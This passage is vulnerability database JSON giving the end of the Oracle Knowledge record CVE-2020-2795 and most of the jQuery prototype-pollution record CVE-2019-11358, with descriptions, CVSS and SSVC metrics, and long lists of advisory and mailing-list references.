"version_affected": "=",
"version_value": "8.6.0-8.6.2"
}
]
}
}
]
},
"vendor_name": "Oracle Corporation"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Vulnerability in the Oracle Knowledge product of Oracle Knowledge (component: Information Manager Console). Supported versions that are affected are 8.6.0-8.6.2. Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where Oracle Knowledge executes to compromise Oracle Knowledge. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in takeover of Oracle Knowledge. CVSS 3.0 Base Score 6.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H)."
}
]
},
"impact": {
"cvss": {
"baseScore": "6.3",
"vectorString": "CVSS:3.0/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where Oracle Knowledge executes to compromise Oracle Knowledge. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in takeover of Oracle Knowledge."
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://www.oracle.com/security-alerts/cpuapr2020.html",
"refsource": "MISC",
"url": "https://www.oracle.com/security-alerts/cpuapr2020.html"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "43595867-4340-4103-b7a2-9a5208d29a85",
"assignerShortName": "oracle",
"cveId": "CVE-2020-2795",
"datePublished": "2020-04-15T13:29:46",
"dateReserved": "2019-12-10T00:00:00",
"dateUpdated": "2024-09-30T14:49:06.041Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2019-11358
Vulnerability from cvelistv5
Published
2019-04-19 00:00
Modified
2024-11-15 15:11
Severity ?
EPSS score ?
Summary
jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution. If an unsanitized source object contained an enumerable __proto__ property, it could extend the native Object.prototype.
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T22:48:09.199Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://www.drupal.org/sa-core-2019-006"
},
{
"tags": [
"x_transferred"
],
"url": "https://www.synology.com/security/advisory/Synology_SA_19_19"
},
{
"name": "DSA-4434",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://www.debian.org/security/2019/dsa-4434"
},
{
"name": "20190421 [SECURITY] [DSA 4434-1] drupal7 security update",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://seclists.org/bugtraq/2019/Apr/32"
},
{
"name": "108023",
"tags": [
"vdb-entry",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/108023"
},
{
"name": "[airflow-commits] 20190428 [GitHub] [airflow] feng-tao commented on issue #5197: [AIRFLOW-XXX] Fix CVE-2019-11358",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/08720ef215ee7ab3386c05a1a90a7d1c852bf0706f176a7816bf65fc%40%3Ccommits.airflow.apache.org%3E"
},
{
"name": "[airflow-commits] 20190428 [GitHub] [airflow] feng-tao opened a new pull request #5197: [AIRFLOW-XXX] Fix CVE-2019-11358",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/b736d0784cf02f5a30fbb4c5902762a15ad6d47e17e2c5a17b7d6205%40%3Ccommits.airflow.apache.org%3E"
},
{
"name": "[airflow-commits] 20190428 [GitHub] [airflow] codecov-io commented on issue #5197: [AIRFLOW-XXX] Fix CVE-2019-11358",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/88fb0362fd40e5b605ea8149f63241537b8b6fb5bfa315391fc5cbb7%40%3Ccommits.airflow.apache.org%3E"
},
{
"name": "[airflow-commits] 20190428 [GitHub] [airflow] XD-DENG merged pull request #5197: [AIRFLOW-XXX] Fix CVE-2019-11358",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/5928aa293e39d248266472210c50f176cac1535220f2486e6a7fa844%40%3Ccommits.airflow.apache.org%3E"
},
{
"name": "[airflow-commits] 20190428 [GitHub] [airflow] XD-DENG commented on issue #5197: [AIRFLOW-XXX] Fix CVE-2019-11358",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/6097cdbd6f0a337bedd9bb5cc441b2d525ff002a96531de367e4259f%40%3Ccommits.airflow.apache.org%3E"
},
{
"name": "[debian-lts-announce] 20190506 [SECURITY] [DLA 1777-1] jquery security update",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2019/05/msg00006.html"
},
{
"name": "FEDORA-2019-eba8e44ee6",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5IABSKTYZ5JUGL735UKGXL5YPRYOPUYI/"
},
{
"name": "FEDORA-2019-1a3edd7e8a",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/4UOAZIFCSZ3ENEFOR5IXX6NFAD3HV7FA/"
},
{
"name": "FEDORA-2019-7eaf0bbe7c",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/KYH3OAGR2RTCHRA5NOKX2TES7SNQMWGO/"
},
{
"name": "FEDORA-2019-2a0ce0c58c",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/RLXRX23725JL366CNZGJZ7AQQB7LHQ6F/"
},
{
"name": "FEDORA-2019-a06dffab1c",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QV3PKZC3PQCO3273HAT76PAQZFBEO4KP/"
},
{
"name": "FEDORA-2019-f563e66380",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WZW27UCJ5CYFL4KFFFMYMIBNMIU2ALG5/"
},
{
"name": "20190509 dotCMS v5.1.1 Vulnerabilities",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://seclists.org/bugtraq/2019/May/18"
},
{
"tags": [
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/152787/dotCMS-5.1.1-Vulnerable-Dependencies.html"
},
{
"name": "20190510 dotCMS v5.1.1 HTML Injection \u0026 XSS Vulnerability",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "http://seclists.org/fulldisclosure/2019/May/11"
},
{
"name": "20190510 dotCMS v5.1.1 Vulnerabilities",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "http://seclists.org/fulldisclosure/2019/May/10"
},
{
"name": "20190510 Re: dotCMS v5.1.1 HTML Injection \u0026 XSS Vulnerability",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "http://seclists.org/fulldisclosure/2019/May/13"
},
{
"name": "[debian-lts-announce] 20190520 [SECURITY] [DLA 1797-1] drupal7 security update",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2019/05/msg00029.html"
},
{
"name": "[oss-security] 20190603 Django: CVE-2019-12308 AdminURLFieldWidget XSS (plus patched bundled jQuery for CVE-2019-11358)",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2019/06/03/2"
},
{
"tags": [
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/153237/RetireJS-CORS-Issue-Script-Execution.html"
},
{
"name": "RHSA-2019:1456",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2019:1456"
},
{
"name": "DSA-4460",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://www.debian.org/security/2019/dsa-4460"
},
{
"name": "20190612 [SECURITY] [DSA 4460-1] mediawiki security update",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://seclists.org/bugtraq/2019/Jun/12"
},
{
"name": "openSUSE-SU-2019:1839",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00006.html"
},
{
"name": "RHBA-2019:1570",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHBA-2019:1570"
},
{
"name": "openSUSE-SU-2019:1872",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00025.html"
},
{
"name": "[roller-commits] 20190820 [jira] [Created] (ROL-2150) Fix Js security vulnerabilities detected using retire js",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/ba79cf1658741e9f146e4c59b50aee56656ea95d841d358d006c18b6%40%3Ccommits.roller.apache.org%3E"
},
{
"name": "RHSA-2019:2587",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2019:2587"
},
{
"tags": [
"x_transferred"
],
"url": "https://security.netapp.com/advisory/ntap-20190919-0001/"
},
{
"name": "RHSA-2019:3023",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2019:3023"
},
{
"name": "RHSA-2019:3024",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2019:3024"
},
{
"name": "[drill-dev] 20191017 Dependencies used by Drill contain known vulnerabilities",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3Cdev.drill.apache.org%3E"
},
{
"name": "[drill-dev] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security vulnerabilities",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3Cdev.drill.apache.org%3E"
},
{
"name": "[drill-issues] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security vulnerabilities",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3Cissues.drill.apache.org%3E"
},
{
"name": "[nifi-commits] 20191113 svn commit: r1869773 - /nifi/site/trunk/security.html",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/bcce5a9c532b386c68dab2f6b3ce8b0cc9b950ec551766e76391caa3%40%3Ccommits.nifi.apache.org%3E"
},
{
"tags": [
"x_transferred"
],
"url": "https://www.tenable.com/security/tns-2019-08"
},
{
"name": "[nifi-commits] 20200123 svn commit: r1873083 - /nifi/site/trunk/security.html",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/rca37935d661f4689cb4119f1b3b224413b22be161b678e6e6ce0c69b%40%3Ccommits.nifi.apache.org%3E"
},
{
"name": "[debian-lts-announce] 20200224 [SECURITY] [DLA 2118-1] otrs2 security update",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2020/02/msg00024.html"
},
{
"tags": [
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/156743/OctoberCMS-Insecure-Dependencies.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://www.tenable.com/security/tns-2020-02"
},
{
"name": "[syncope-dev] 20200423 Jquery version on 2.1.x/2.0.x",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/r38f0d1aa3c923c22977fe7376508f030f22e22c1379fbb155bf29766%40%3Cdev.syncope.apache.org%3E"
},
{
"name": "[flink-dev] 20200513 [jira] [Created] (FLINK-17675) Resolve CVE-2019-11358 from jquery",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/r7aac081cbddb6baa24b75e74abf0929bf309b176755a53e3ed810355%40%3Cdev.flink.apache.org%3E"
},
{
"name": "[flink-issues] 20200513 [jira] [Created] (FLINK-17675) Resolve CVE-2019-11358 from jquery",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/rac25da84ecdcd36f6de5ad0d255f4e967209bbbebddb285e231da37d%40%3Cissues.flink.apache.org%3E"
},
{
"name": "[flink-issues] 20200518 [jira] [Commented] (FLINK-17675) Resolve CVE-2019-11358 from jquery",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/r2041a75d3fc09dec55adfd95d598b38d22715303f65c997c054844c9%40%3Cissues.flink.apache.org%3E"
},
{
"name": "[flink-issues] 20200518 [jira] [Updated] (FLINK-17675) Resolve CVE-2019-11358 from jquery",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/r7e8ebccb7c022e41295f6fdb7b971209b83702339f872ddd8cf8bf73%40%3Cissues.flink.apache.org%3E"
},
{
"name": "[flink-issues] 20200518 [jira] [Assigned] (FLINK-17675) Resolve CVE-2019-11358 from jquery",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/r41b5bfe009c845f67d4f68948cc9419ac2d62e287804aafd72892b08%40%3Cissues.flink.apache.org%3E"
},
{
"name": "[flink-issues] 20200520 [jira] [Closed] (FLINK-17675) Resolve CVE-2019-11358 from jquery",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/r2baacab6e0acb5a2092eb46ae04fd6c3e8277b4fd79b1ffb7f3254fa%40%3Cissues.flink.apache.org%3E"
},
{
"tags": [
"x_transferred"
],
"url": "https://www.oracle.com/security-alerts/cpuapr2020.html"
},
{
"name": "[storm-dev] 20200708 [GitHub] [storm] Crim opened a new pull request #3305: [STORM-3553] Upgrade jQuery from 1.11.1 to 3.5.1",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/r7d64895cc4dff84d0becfc572b20c0e4bf9bfa7b10c6f5f73e783734%40%3Cdev.storm.apache.org%3E"
},
{
"tags": [
"x_transferred"
],
"url": "https://www.oracle.com/security-alerts/cpujul2020.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://www.oracle.com/security-alerts/cpujan2020.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://backdropcms.org/security/backdrop-sa-core-2019-009"
},
{
"tags": [
"x_transferred"
],
"url": "https://blog.jquery.com/2019/04/10/jquery-3-4-0-released/"
},
{
"tags": [
"x_transferred"
],
"url": "https://snyk.io/vuln/SNYK-JS-JQUERY-174006"
},
{
"tags": [
"x_transferred"
],
"url": "https://github.com/jquery/jquery/pull/4333"
},
{
"tags": [
"x_transferred"
],
"url": "https://github.com/jquery/jquery/commit/753d591aea698e57d6db58c9f722cd0808619b1b"
},
{
"tags": [
"x_transferred"
],
"url": "https://www.privacy-wise.com/mitigating-cve-2019-11358-in-old-versions-of-jquery/"
},
{
"tags": [
"x_transferred"
],
"url": "https://www.oracle.com/security-alerts/cpuoct2020.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44601"
},
{
"tags": [
"x_transferred"
],
"url": "https://www.oracle.com/security-alerts/cpujan2021.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://www.oracle.com/security-alerts/cpuApr2021.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://www.oracle.com//security-alerts/cpujul2021.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://www.oracle.com/security-alerts/cpuoct2021.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://www.oracle.com/security-alerts/cpujan2022.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://supportportal.juniper.net/s/article/2021-07-Security-Bulletin-Junos-OS-Multiple-J-Web-vulnerabilities-resolved-in-Junos-OS-21-2R1"
},
{
"name": "[debian-lts-announce] 20230831 [SECURITY] [DLA 3551-1] otrs2 security update",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/08/msg00040.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2019-11358",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-02-20T15:03:16.892088Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-11-15T15:11:23.024Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution. If an unsanitized source object contained an enumerable __proto__ property, it could extend the native Object.prototype."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-08-31T02:06:52.187292",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"url": "https://www.drupal.org/sa-core-2019-006"
},
{
"url": "https://www.synology.com/security/advisory/Synology_SA_19_19"
},
{
"name": "DSA-4434",
"tags": [
"vendor-advisory"
],
"url": "https://www.debian.org/security/2019/dsa-4434"
},
{
"name": "20190421 [SECURITY] [DSA 4434-1] drupal7 security update",
"tags": [
"mailing-list"
],
"url": "https://seclists.org/bugtraq/2019/Apr/32"
},
{
"name": "108023",
"tags": [
"vdb-entry"
],
"url": "http://www.securityfocus.com/bid/108023"
},
{
"name": "[airflow-commits] 20190428 [GitHub] [airflow] feng-tao commented on issue #5197: [AIRFLOW-XXX] Fix CVE-2019-11358",
"tags": [
"mailing-list"
],
"url": "https://lists.apache.org/thread.html/08720ef215ee7ab3386c05a1a90a7d1c852bf0706f176a7816bf65fc%40%3Ccommits.airflow.apache.org%3E"
},
{
"name": "[airflow-commits] 20190428 [GitHub] [airflow] feng-tao opened a new pull request #5197: [AIRFLOW-XXX] Fix CVE-2019-11358",
"tags": [
"mailing-list"
],
"url": "https://lists.apache.org/thread.html/b736d0784cf02f5a30fbb4c5902762a15ad6d47e17e2c5a17b7d6205%40%3Ccommits.airflow.apache.org%3E"
},
{
"name": "[airflow-commits] 20190428 [GitHub] [airflow] codecov-io commented on issue #5197: [AIRFLOW-XXX] Fix CVE-2019-11358",
"tags": [
"mailing-list"
],
"url": "https://lists.apache.org/thread.html/88fb0362fd40e5b605ea8149f63241537b8b6fb5bfa315391fc5cbb7%40%3Ccommits.airflow.apache.org%3E"
},
{
"name": "[airflow-commits] 20190428 [GitHub] [airflow] XD-DENG merged pull request #5197: [AIRFLOW-XXX] Fix CVE-2019-11358",
"tags": [
"mailing-list"
],
"url": "https://lists.apache.org/thread.html/5928aa293e39d248266472210c50f176cac1535220f2486e6a7fa844%40%3Ccommits.airflow.apache.org%3E"
},
{
"name": "[airflow-commits] 20190428 [GitHub] [airflow] XD-DENG commented on issue #5197: [AIRFLOW-XXX] Fix CVE-2019-11358",
"tags": [
"mailing-list"
],
"url": "https://lists.apache.org/thread.html/6097cdbd6f0a337bedd9bb5cc441b2d525ff002a96531de367e4259f%40%3Ccommits.airflow.apache.org%3E"
},
{
"name": "[debian-lts-announce] 20190506 [SECURITY] [DLA 1777-1] jquery security update",
"tags": [
"mailing-list"
],
"url": "https://lists.debian.org/debian-lts-announce/2019/05/msg00006.html"
},
{
"name": "FEDORA-2019-eba8e44ee6",
"tags": [
"vendor-advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5IABSKTYZ5JUGL735UKGXL5YPRYOPUYI/"
},
{
"name": "FEDORA-2019-1a3edd7e8a",
"tags": [
"vendor-advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/4UOAZIFCSZ3ENEFOR5IXX6NFAD3HV7FA/"
},
{
"name": "FEDORA-2019-7eaf0bbe7c",
"tags": [
"vendor-advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/KYH3OAGR2RTCHRA5NOKX2TES7SNQMWGO/"
},
{
"name": "FEDORA-2019-2a0ce0c58c",
"tags": [
"vendor-advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/RLXRX23725JL366CNZGJZ7AQQB7LHQ6F/"
},
{
"name": "FEDORA-2019-a06dffab1c",
"tags": [
"vendor-advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QV3PKZC3PQCO3273HAT76PAQZFBEO4KP/"
},
{
"name": "FEDORA-2019-f563e66380",
"tags": [
"vendor-advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WZW27UCJ5CYFL4KFFFMYMIBNMIU2ALG5/"
},
{
"name": "20190509 dotCMS v5.1.1 Vulnerabilities",
"tags": [
"mailing-list"
],
"url": "https://seclists.org/bugtraq/2019/May/18"
},
{
"url": "http://packetstormsecurity.com/files/152787/dotCMS-5.1.1-Vulnerable-Dependencies.html"
},
{
"name": "20190510 dotCMS v5.1.1 HTML Injection \u0026 XSS Vulnerability",
"tags": [
"mailing-list"
],
"url": "http://seclists.org/fulldisclosure/2019/May/11"
},
{
"name": "20190510 dotCMS v5.1.1 Vulnerabilities",
"tags": [
"mailing-list"
],
"url": "http://seclists.org/fulldisclosure/2019/May/10"
},
{
"name": "20190510 Re: dotCMS v5.1.1 HTML Injection \u0026 XSS Vulnerability",
"tags": [
"mailing-list"
],
"url": "http://seclists.org/fulldisclosure/2019/May/13"
},
{
"name": "[debian-lts-announce] 20190520 [SECURITY] [DLA 1797-1] drupal7 security update",
"tags": [
"mailing-list"
],
"url": "https://lists.debian.org/debian-lts-announce/2019/05/msg00029.html"
},
{
"name": "[oss-security] 20190603 Django: CVE-2019-12308 AdminURLFieldWidget XSS (plus patched bundled jQuery for CVE-2019-11358)",
"tags": [
"mailing-list"
],
"url": "http://www.openwall.com/lists/oss-security/2019/06/03/2"
},
{
"url": "http://packetstormsecurity.com/files/153237/RetireJS-CORS-Issue-Script-Execution.html"
},
{
"name": "RHSA-2019:1456",
"tags": [
"vendor-advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:1456"
},
{
"name": "DSA-4460",
"tags": [
"vendor-advisory"
],
"url": "https://www.debian.org/security/2019/dsa-4460"
},
{
"name": "20190612 [SECURITY] [DSA 4460-1] mediawiki security update",
"tags": [
"mailing-list"
],
"url": "https://seclists.org/bugtraq/2019/Jun/12"
},
{
"name": "openSUSE-SU-2019:1839",
"tags": [
"vendor-advisory"
],
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00006.html"
},
{
"name": "RHBA-2019:1570",
"tags": [
"vendor-advisory"
],
"url": "https://access.redhat.com/errata/RHBA-2019:1570"
},
{
"name": "openSUSE-SU-2019:1872",
"tags": [
"vendor-advisory"
],
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00025.html"
},
{
"name": "[roller-commits] 20190820 [jira] [Created] (ROL-2150) Fix Js security vulnerabilities detected using retire js",
"tags": [
"mailing-list"
],
"url": "https://lists.apache.org/thread.html/ba79cf1658741e9f146e4c59b50aee56656ea95d841d358d006c18b6%40%3Ccommits.roller.apache.org%3E"
},
{
"name": "RHSA-2019:2587",
"tags": [
"vendor-advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:2587"
},
{
"url": "https://security.netapp.com/advisory/ntap-20190919-0001/"
},
{
"name": "RHSA-2019:3023",
"tags": [
"vendor-advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:3023"
},
{
"name": "RHSA-2019:3024",
"tags": [
"vendor-advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:3024"
},
{
"name": "[drill-dev] 20191017 Dependencies used by Drill contain known vulnerabilities",
"tags": [
"mailing-list"
],
"url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3Cdev.drill.apache.org%3E"
},
{
"name": "[drill-dev] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security vulnerabilities",
"tags": [
"mailing-list"
],
"url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3Cdev.drill.apache.org%3E"
},
{
"name": "[drill-issues] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security vulnerabilities",
"tags": [
"mailing-list"
],
"url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3Cissues.drill.apache.org%3E"
},
{
"name": "[nifi-commits] 20191113 svn commit: r1869773 - /nifi/site/trunk/security.html",
"tags": [
"mailing-list"
],
"url": "https://lists.apache.org/thread.html/bcce5a9c532b386c68dab2f6b3ce8b0cc9b950ec551766e76391caa3%40%3Ccommits.nifi.apache.org%3E"
},
{
"url": "https://www.tenable.com/security/tns-2019-08"
},
{
"name": "[nifi-commits] 20200123 svn commit: r1873083 - /nifi/site/trunk/security.html",
"tags": [
"mailing-list"
],
"url": "https://lists.apache.org/thread.html/rca37935d661f4689cb4119f1b3b224413b22be161b678e6e6ce0c69b%40%3Ccommits.nifi.apache.org%3E"
},
{
"name": "[debian-lts-announce] 20200224 [SECURITY] [DLA 2118-1] otrs2 security update",
"tags": [
"mailing-list"
],
"url": "https://lists.debian.org/debian-lts-announce/2020/02/msg00024.html"
},
{
"url": "http://packetstormsecurity.com/files/156743/OctoberCMS-Insecure-Dependencies.html"
},
{
"url": "https://www.tenable.com/security/tns-2020-02"
},
{
"name": "[syncope-dev] 20200423 Jquery version on 2.1.x/2.0.x",
"tags": [
"mailing-list"
],
"url": "https://lists.apache.org/thread.html/r38f0d1aa3c923c22977fe7376508f030f22e22c1379fbb155bf29766%40%3Cdev.syncope.apache.org%3E"
},
{
"name": "[flink-dev] 20200513 [jira] [Created] (FLINK-17675) Resolve CVE-2019-11358 from jquery",
"tags": [
"mailing-list"
],
"url": "https://lists.apache.org/thread.html/r7aac081cbddb6baa24b75e74abf0929bf309b176755a53e3ed810355%40%3Cdev.flink.apache.org%3E"
},
{
"name": "[flink-issues] 20200513 [jira] [Created] (FLINK-17675) Resolve CVE-2019-11358 from jquery",
"tags": [
"mailing-list"
],
"url": "https://lists.apache.org/thread.html/rac25da84ecdcd36f6de5ad0d255f4e967209bbbebddb285e231da37d%40%3Cissues.flink.apache.org%3E"
},
{
"name": "[flink-issues] 20200518 [jira] [Commented] (FLINK-17675) Resolve CVE-2019-11358 from jquery",
"tags": [
"mailing-list"
],
"url": "https://lists.apache.org/thread.html/r2041a75d3fc09dec55adfd95d598b38d22715303f65c997c054844c9%40%3Cissues.flink.apache.org%3E"
},
{
"name": "[flink-issues] 20200518 [jira] [Updated] (FLINK-17675) Resolve CVE-2019-11358 from jquery",
"tags": [
"mailing-list"
],
"url": "https://lists.apache.org/thread.html/r7e8ebccb7c022e41295f6fdb7b971209b83702339f872ddd8cf8bf73%40%3Cissues.flink.apache.org%3E"
},
{
"name": "[flink-issues] 20200518 [jira] [Assigned] (FLINK-17675) Resolve CVE-2019-11358 from jquery",
"tags": [
"mailing-list"
],
"url": "https://lists.apache.org/thread.html/r41b5bfe009c845f67d4f68948cc9419ac2d62e287804aafd72892b08%40%3Cissues.flink.apache.org%3E"
},
{
"name": "[flink-issues] 20200520 [jira] [Closed] (FLINK-17675) Resolve CVE-2019-11358 from jquery",
"tags": [
"mailing-list"
],
"url": "https://lists.apache.org/thread.html/r2baacab6e0acb5a2092eb46ae04fd6c3e8277b4fd79b1ffb7f3254fa%40%3Cissues.flink.apache.org%3E"
},
{
"url": "https://www.oracle.com/security-alerts/cpuapr2020.html"
},
{
"name": "[storm-dev] 20200708 [GitHub] [storm] Crim opened a new pull request #3305: [STORM-3553] Upgrade jQuery from 1.11.1 to 3.5.1",
"tags": [
"mailing-list"
],
"url": "https://lists.apache.org/thread.html/r7d64895cc4dff84d0becfc572b20c0e4bf9bfa7b10c6f5f73e783734%40%3Cdev.storm.apache.org%3E"
},
{
"url": "https://www.oracle.com/security-alerts/cpujul2020.html"
},
{
"url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html"
},
{
"url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html"
},
{
"url": "https://www.oracle.com/security-alerts/cpujan2020.html"
},
{
"url": "https://backdropcms.org/security/backdrop-sa-core-2019-009"
},
{
"url": "https://blog.jquery.com/2019/04/10/jquery-3-4-0-released/"
},
{
"url": "https://snyk.io/vuln/SNYK-JS-JQUERY-174006"
},
{
"url": "https://github.com/jquery/jquery/pull/4333"
